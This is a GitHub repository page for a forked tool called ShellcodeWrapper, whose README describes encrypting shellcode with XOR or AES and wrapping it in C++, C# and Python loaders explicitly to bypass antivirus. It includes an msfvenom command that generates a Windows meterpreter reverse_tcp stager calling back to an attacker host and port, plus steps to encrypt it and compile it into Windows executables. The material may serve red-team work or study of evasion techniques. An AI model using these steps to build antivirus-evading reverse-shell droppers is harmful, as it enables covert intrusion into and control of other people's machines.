Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly
Appearance settings
/ ShellcodeWrapper Public
forked from Arno0x/ShellcodeWrapper

Shellcode wrapper with encryption for multiple target languages

0 stars 123 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

m7x/ShellcodeWrapper

BranchesTags
Open more actions menu
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
11 Commits
result
result
 
 
templates
templates
 
 
readme.md
readme.md
 
 
requirements.txt
requirements.txt
 
 
shellcode_encoder.py
shellcode_encoder.py
 
 

Repository files navigation

ToDo

  • Caesar chipher for C#
  • Caesar chipher for C++
  • Caeser chipher for Python

Mutlibyte XOR or AES encrypted shellcode

Author: Arno0x0x - @Arno0x0x

These little proof of concept are inspired by this blogpost: Bypass antivirus with 10 lines of code

The technique uses two kind of code file:

  1. The shellcode encoder/encrypter: shellcode_encoder.py
  2. Various shellcode wrapper, in C++, C# and Python:
    • encryptedShellcodeWrapper.cpp - for now supports only XOR encryption
    • encryptedShellcodeWrapper.cs - supports both XOR and AES encryption
    • encryptedShellcodeWrapper.py - supports both XOR and AES encryption

Installation

Installation is straight forward:

  • Git clone this repository: git clone https://github.com/Arno0x/ShellcodeWrapper ShellcodeWrapper
  • cd into the ShellcodeWrapper folder: cd ShellcodeWrapper
  • Install requirements using pip install -r requirements.txt
  • Give the execution rights to the main script: chmod +x shellcode_encoder.py

Usage

First, you need to obtain a usable shellcode from metasploit (run it from a Kali distribution), for example:

root@kali:~# msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.52.130 LPORT=4444 -f raw > shellcode.raw

In this example, the output is a raw (unencoded & unencrypted) reverse_tcp meterpreter stager for x86 platform. You should adapt it to your needs (payload and parameters).

Second, run the shellcode_encoder.py script along with the desired arguments:

  • raw shellcode filename
  • encryption key
  • encryption type: xor or aes
  • desired output: base64, cpp, csharp, python

For instance, to xor encrypt the shellcode with the key 'thisismykey' and get an output code file in C#, C++ and Python:

root@kali:~# ./shellcode_encoder.py -cpp -cs -py shellcode.raw thisismykey xor

This will generate C#, C++ and Python code file in the result folder. Those files are ready to use/compile.

Eventually:

  1. For the C++ wrapper, compile the C++ code file into a Windows executable: you can create a new VisualStudio project for Win32 console application and use the C++ code provided as the main file. Any other method of compilation will require slight adjustment of the C++ code (headers mostly).
  2. For the C# wrapper, compile the C# code file into a Windows executable: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:multibyteEncodeShellcode.exe multibyteEncodeShellcode.cs
  3. For the Python wrapper, just run it as a python script, or use PyInstaller to make it a Windows standalone executable

About

Shellcode wrapper with encryption for multiple target languages

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages

  • C# 61.4%
  • Python 31.1%
  • Batchfile 5.6%
  • C++ 1.9%
Morty Proxy This is a proxified and sanitized view of the page, visit original site.